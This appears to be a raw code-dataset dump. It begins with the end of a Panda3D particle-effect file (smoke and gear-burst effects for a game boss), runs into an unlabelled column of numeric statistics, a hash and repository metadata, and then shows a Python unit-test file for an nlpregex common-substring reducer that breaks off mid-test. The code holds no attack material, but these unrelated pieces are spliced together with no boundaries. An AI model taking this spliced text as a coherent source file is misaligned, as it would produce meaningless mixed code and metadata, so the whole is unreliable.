p0.factory.setLifespanBase(1.0)
p0.factory.setLifespanSpread(0.0)
p0.factory.setMassBase(1.0)
p0.factory.setMassSpread(0.0)
p0.factory.setTerminalVelocityBase(400.0)
p0.factory.setTerminalVelocitySpread(0.0)
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.0)
p0.renderer.setHeadColor(Vec4(0.39, 0.39, 0.58, 0.49))
p0.renderer.setTailColor(Vec4(0.39, 0.39, 0.39, 0.29))
p0.renderer.setLineScaleFactor(1.7)
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.2)
p0.emitter.setAmplitudeSpread(0.0)
p0.emitter.setOffsetForce(Vec3(11.3, 0.0, -41.0))
p0.emitter.setExplicitLaunchVector(Vec3(1.0, 0.0, 0.0))
p0.emitter.setRadiateOrigin(Point3(0.0, 0.0, 0.0))
p0.emitter.setRadius(100.0)
self.addParticles(p0)
@particle
def smoke(self):
self.reset()
self.setPos(0.000, 3.500, 5.100)
self.setHpr(-180.000, 80.000, -180.000)
self.setScale(0.0250, 0.0250, 0.0250)
p0 = Particles.Particles('particles-1')
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0300)
p0.setLitterSize(1)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
p0.factory.setLifespanBase(1.6000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
p0.renderer.setIgnoreScale(1)
p0.renderer.addTextureFromFile('phase_6/maps/tt_t_efx_ext_smoke_a.rgb')
p0.renderer.setColor(Vec4(0.10, 0.10, 0.10, 0.10))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.6)
p0.renderer.setFinalXScale(0.3)
p0.renderer.setInitialYScale(0.6)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -4.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadius(0.0200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERR, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -5.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def bossCogFrontAttack(self):
self.reset()
self.setPos(0.000, 0.000, 4.600)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(200)
p0.setBirthRate(0.0050)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.150)
p0.renderer.setFinalXScale(0.300)
p0.renderer.setInitialYScale(0.150)
p0.renderer.setFinalYScale(0.300)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, -10.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 50.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
| 37.640062
| 207
| 0.726515
| 23,778
| 195,239
| 5.96194
| 0.021322
| 0.043559
| 0.032378
| 0.0261
| 0.948788
| 0.939124
| 0.925044
| 0.92316
| 0.913899
| 0.897251
| 0
| 0.138925
| 0.145985
| 195,239
| 5,186
| 208
| 37.64732
| 0.711294
| 0.081142
| 0
| 0.857209
| 0
| 0
| 0.053354
| 0.022376
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01907
| false
| 0
| 0.000465
| 0
| 0.019535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82ed17dbe78d72616b8b39524372b799ce6630b4
| 63,814
|
py
|
Python
|
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | 1
|
2021-12-03T07:20:18.000Z
|
2021-12-03T07:20:18.000Z
|
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
regular_language/unit_tests/test_common_substring_reducer.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Unit Tests for common_substring_reducer.py."""
import unittest
import nlpregex.regular_language.ast
import nlpregex.regular_language.sse_forrest
import nlpregex.regular_language.common_substring_reducer
from nlpregex.regular_language.unit_tests.test_sse_asforrest_helper import test_sse_ASForrest_helper
class test_CommonSubstringReducer( unittest.TestCase ):
def __init__( self, *args, **kwargs ):
unittest.TestCase.__init__(self, *args, **kwargs)
self.helper = test_sse_ASForrest_helper()
def create_initial_serial_node( self, forrest, children ):
if len( children ) == 0:
return forrest.create_initial_node('e')
if len( children )== 1:
return forrest.create_initial_node( children[0] )
r = forrest.create_initial_node('s' )
for c in children:
n = forrest.create_initial_node( c )
e = nlpregex.regular_language.sse_forrest.sseASTEdge()
e.add_to_graph( forrest, r, n, "directed" )
r.generate_regex()
return r
def add_question_node( self, forrest, n ):
r = forrest.create_initial_node('?' )
e = nlpregex.regular_language.sse_forrest.sseASTEdge()
e.add_to_graph( forrest, r, n, "directed" )
r.generate_regex()
return r
def test_constructor_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0 )
self.assertEqual( len(reducer01.series_nodes), 0 )
self.assertEqual( reducer01.min_num_subtrees, 2 )
self.assertEqual( reducer01.min_num_terms, 2 )
def test_find_series_nodes_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:|_3 |_4 |_5
S_2:|_6 |_7
|_3:T1_8 S_9
S_9:T2_10 T3_11
|_4:T4_12 S_13
S_13:T5_14 T6_15
|_5:T1_16 S_17
S_17:T2_18 T3_19
|_6:T1_20 S_21
S_21:T2_22 T3_23
|_7:T4_24 S_25
S_25:T5_26 T6_27
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
self.assertEqual( len(reducer01.series_nodes), 7)
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
series09 = self.helper.get_node( forrest01, 9 )
series13 = self.helper.get_node( forrest01, 13 )
series17 = self.helper.get_node( forrest01, 17 )
series21 = self.helper.get_node( forrest01, 21 )
series25 = self.helper.get_node( forrest01, 25 )
sorted_unions = sorted( reducer01.series_nodes )
self.assertEqual( sorted_unions[0], series01 )
self.assertEqual( sorted_unions[1], series02 )
self.assertEqual( sorted_unions[2], series09 )
self.assertEqual( sorted_unions[3], series13 )
self.assertEqual( sorted_unions[4], series17 )
self.assertEqual( sorted_unions[5], series21 )
self.assertEqual( sorted_unions[6], series25 )
def test_construct_map_series_pair_0001( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T2_10 T3_11 T4_12 T8_13 T9_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t2%t3%t4']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 1 in positions01_01, True)
self.assertEqual( 1 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 1 in positions02_01, True)
self.assertEqual( 1 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t3%t4']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 2 in positions03_01, True)
self.assertEqual( 2 in positions03_02, True)
def test_construct_map_series_pair_0002( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T10_12 T11_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0)
def test_construct_map_series_pair_0003( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T8_10 T3_11 T10_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 0)
def test_construct_map_series_pair_0004( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T1_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 1)
nodes01 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes01), 2)
positions01 = nodes01[series01]
positions02 = nodes01[series02]
self.assertEqual( len(positions01), 1)
self.assertEqual( len(positions02), 1)
self.assertEqual( 0 in positions01, True)
self.assertEqual( 1 in positions02, True)
def test_construct_map_series_pair_0005( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T2_9 T3_10 T2_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 1)
nodes01 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes01), 2)
positions01 = nodes01[series01]
positions02 = nodes01[series02]
self.assertEqual( len(positions01), 1)
self.assertEqual( len(positions02), 1)
self.assertEqual( 1 in positions01, True)
self.assertEqual( 0 in positions02, True)
def test_construct_map_series_pair_0006( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T1_9 T2_10 T3_11 T8_12 T5_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t1%t2%t3']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 0 in positions01_01, True)
self.assertEqual( 0 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 0 in positions02_01, True)
self.assertEqual( 0 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 1 in positions03_01, True)
self.assertEqual( 1 in positions03_02, True)
def test_construct_map_series_pair_0007( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T4_11 T5_12 T6_13 T12_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t4%t5%t6']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 3 in positions01_01, True)
self.assertEqual( 2 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t4%t5']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 3 in positions02_01, True)
self.assertEqual( 2 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t5%t6']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 4 in positions03_01, True)
self.assertEqual( 3 in positions03_02, True)
def test_construct_map_series_pair_0008( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T3_12 T4_13 T5_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t3%t4%t5']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 2 in positions01_01, True)
self.assertEqual( 3 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t3%t4']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 2 in positions02_01, True)
self.assertEqual( 3 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t4%t5']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 3 in positions03_01, True)
self.assertEqual( 4 in positions03_02, True)
def test_construct_map_series_pair_0009( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T4_6 T5_7 T6_8
S_2:T7_9 T8_10 T9_11 T4_12 T5_13 T6_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t4%t5%t6']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 1)
self.assertEqual( len(positions01_02), 1)
self.assertEqual( 3 in positions01_01, True)
self.assertEqual( 3 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t4%t5']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 1)
self.assertEqual( len(positions02_02), 1)
self.assertEqual( 3 in positions02_01, True)
self.assertEqual( 3 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t5%t6']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 4 in positions03_01, True)
self.assertEqual( 4 in positions03_02, True)
def test_construct_map_series_pair_0010( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
S_2:T1_9 T2_10 T3_11 T1_12 T2_13 T3_14
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 12)
nodes01 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes01), 2)
positions01_01 = nodes01[series01]
positions01_02 = nodes01[series02]
self.assertEqual( len(positions01_01), 2)
self.assertEqual( len(positions01_02), 2)
self.assertEqual( 0 in positions01_01, True)
self.assertEqual( 3 in positions01_01, True)
self.assertEqual( 0 in positions01_02, True)
self.assertEqual( 3 in positions01_02, True)
nodes02 = reducer01.map_regex_to_node_set['t1%t2%t3']
self.assertEqual( len(nodes02), 2)
positions02_01 = nodes02[series01]
positions02_02 = nodes02[series02]
self.assertEqual( len(positions02_01), 2)
self.assertEqual( len(positions02_02), 2)
self.assertEqual( 0 in positions02_01, True)
self.assertEqual( 3 in positions02_01, True)
self.assertEqual( 0 in positions02_02, True)
self.assertEqual( 3 in positions02_02, True)
nodes03 = reducer01.map_regex_to_node_set['t1%t2%t3%t1']
self.assertEqual( len(nodes03), 2)
positions03_01 = nodes03[series01]
positions03_02 = nodes03[series02]
self.assertEqual( len(positions03_01), 1)
self.assertEqual( len(positions03_02), 1)
self.assertEqual( 0 in positions03_01, True)
self.assertEqual( 0 in positions03_02, True)
nodes04 = reducer01.map_regex_to_node_set['t1%t2%t3%t1%t2']
self.assertEqual( len(nodes04), 2)
positions04_01 = nodes04[series01]
positions04_02 = nodes04[series02]
self.assertEqual( len(positions04_01), 1)
self.assertEqual( len(positions04_02), 1)
self.assertEqual( 0 in positions04_01, True)
self.assertEqual( 0 in positions04_02, True)
nodes05 = reducer01.map_regex_to_node_set['t1%t2%t3%t1%t2%t3']
self.assertEqual( len(nodes05), 2)
positions05_01 = nodes05[series01]
positions05_02 = nodes05[series02]
self.assertEqual( len(positions05_01), 1)
self.assertEqual( len(positions05_02), 1)
self.assertEqual( 0 in positions05_01, True)
self.assertEqual( 0 in positions05_02, True)
nodes06 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes06), 2)
positions06_01 = nodes06[series01]
positions06_02 = nodes06[series02]
self.assertEqual( len(positions06_01), 2)
self.assertEqual( len(positions06_02), 2)
self.assertEqual( 1 in positions06_01, True)
self.assertEqual( 4 in positions06_01, True)
self.assertEqual( 1 in positions06_02, True)
self.assertEqual( 4 in positions06_02, True)
nodes07 = reducer01.map_regex_to_node_set['t2%t3%t1']
self.assertEqual( len(nodes07), 2)
positions07_01 = nodes07[series01]
positions07_02 = nodes07[series02]
self.assertEqual( len(positions07_01), 1)
self.assertEqual( len(positions07_02), 1)
self.assertEqual( 1 in positions07_01, True)
self.assertEqual( 1 in positions07_02, True)
nodes08 = reducer01.map_regex_to_node_set['t2%t3%t1%t2']
self.assertEqual( len(nodes08), 2)
positions08_01 = nodes08[series01]
positions08_02 = nodes08[series02]
self.assertEqual( len(positions08_01), 1)
self.assertEqual( len(positions08_02), 1)
self.assertEqual( 1 in positions08_01, True)
self.assertEqual( 1 in positions08_02, True)
nodes09 = reducer01.map_regex_to_node_set['t2%t3%t1%t2%t3']
self.assertEqual( len(nodes09), 2)
positions09_01 = nodes09[series01]
positions09_02 = nodes09[series02]
self.assertEqual( len(positions09_01), 1)
self.assertEqual( len(positions09_02), 1)
self.assertEqual( 1 in positions09_01, True)
self.assertEqual( 1 in positions09_02, True)
nodes10 = reducer01.map_regex_to_node_set['t3%t1']
self.assertEqual( len(nodes10), 2)
positions10_01 = nodes10[series01]
positions10_02 = nodes10[series02]
self.assertEqual( len(positions10_01), 1)
self.assertEqual( len(positions10_02), 1)
self.assertEqual( 2 in positions10_01, True)
self.assertEqual( 2 in positions10_02, True)
nodes11 = reducer01.map_regex_to_node_set['t3%t1%t2']
self.assertEqual( len(nodes11), 2)
positions11_01 = nodes11[series01]
positions11_02 = nodes11[series02]
self.assertEqual( len(positions11_01), 1)
self.assertEqual( len(positions11_02), 1)
self.assertEqual( 2 in positions11_01, True)
self.assertEqual( 2 in positions11_02, True)
nodes12 = reducer01.map_regex_to_node_set['t3%t1%t2%t3']
self.assertEqual( len(nodes12), 2)
positions12_01 = nodes12[series01]
positions12_02 = nodes12[series02]
self.assertEqual( len(positions12_01), 1)
self.assertEqual( len(positions12_02), 1)
self.assertEqual( 2 in positions12_01, True)
self.assertEqual( 2 in positions12_02, True)
# Self-overlap
def test_construct_map_series_pair_0011( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1
S_1:T1_3 T2_4 T3_5 T1_6 T2_7 T3_8
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 1 )
series01 = self.helper.get_node( forrest01, 1 )
self.assertEqual( len(reducer01.map_regex_to_node_set), 3)
nodes01 = reducer01.map_regex_to_node_set['t1%t2']
self.assertEqual( len(nodes01), 1)
positions01_01 = nodes01[series01]
self.assertEqual( len(positions01_01), 2)
self.assertEqual( 0 in positions01_01, True)
self.assertEqual( 3 in positions01_01, True)
nodes02 = reducer01.map_regex_to_node_set['t1%t2%t3']
self.assertEqual( len(nodes02), 1)
positions02_01 = nodes02[series01]
self.assertEqual( len(positions02_01), 2)
self.assertEqual( 0 in positions02_01, True)
self.assertEqual( 3 in positions02_01, True)
nodes03 = reducer01.map_regex_to_node_set['t2%t3']
self.assertEqual( len(nodes03), 1)
positions03_01 = nodes03[series01]
self.assertEqual( len(positions03_01), 2)
self.assertEqual( 1 in positions03_01, True)
self.assertEqual( 4 in positions03_01, True)
def test_construct_map_series_pair_0012( self ):
forrest01 = nlpregex.regular_language.sse_forrest.sseASForrest()
reducer01 = nlpregex.regular_language.common_substring_reducer.CommonSubstringReducer( forrest01 )
spec01= '''
R_0:S_1 S_2
S_1:T1_3 |_4 T3_5 ?_6 T5_7 T6_8
S_2:T7_9 T8_10 |_11 T3_12 ?_13 T9_14
|_4:T10_15 T11_16
?_6:T12_17
|_11:T10_18 T11_19
?_13:T12_20
'''
root01 = self.helper.construct_ast_from_spec( forrest01, spec01 )
forrest01.add_root(root01)
forrest01.visit_and_prepare_for_reduction( root01 )
reducer01.find_series_nodes()
reducer01.construct_map_series_pairs()
self.assertEqual( len(reducer01.series_nodes), 2 )
series01 = self.helper.get_node( forrest01, 1 )
series02 = self.helper.get_node( forrest01, 2 )
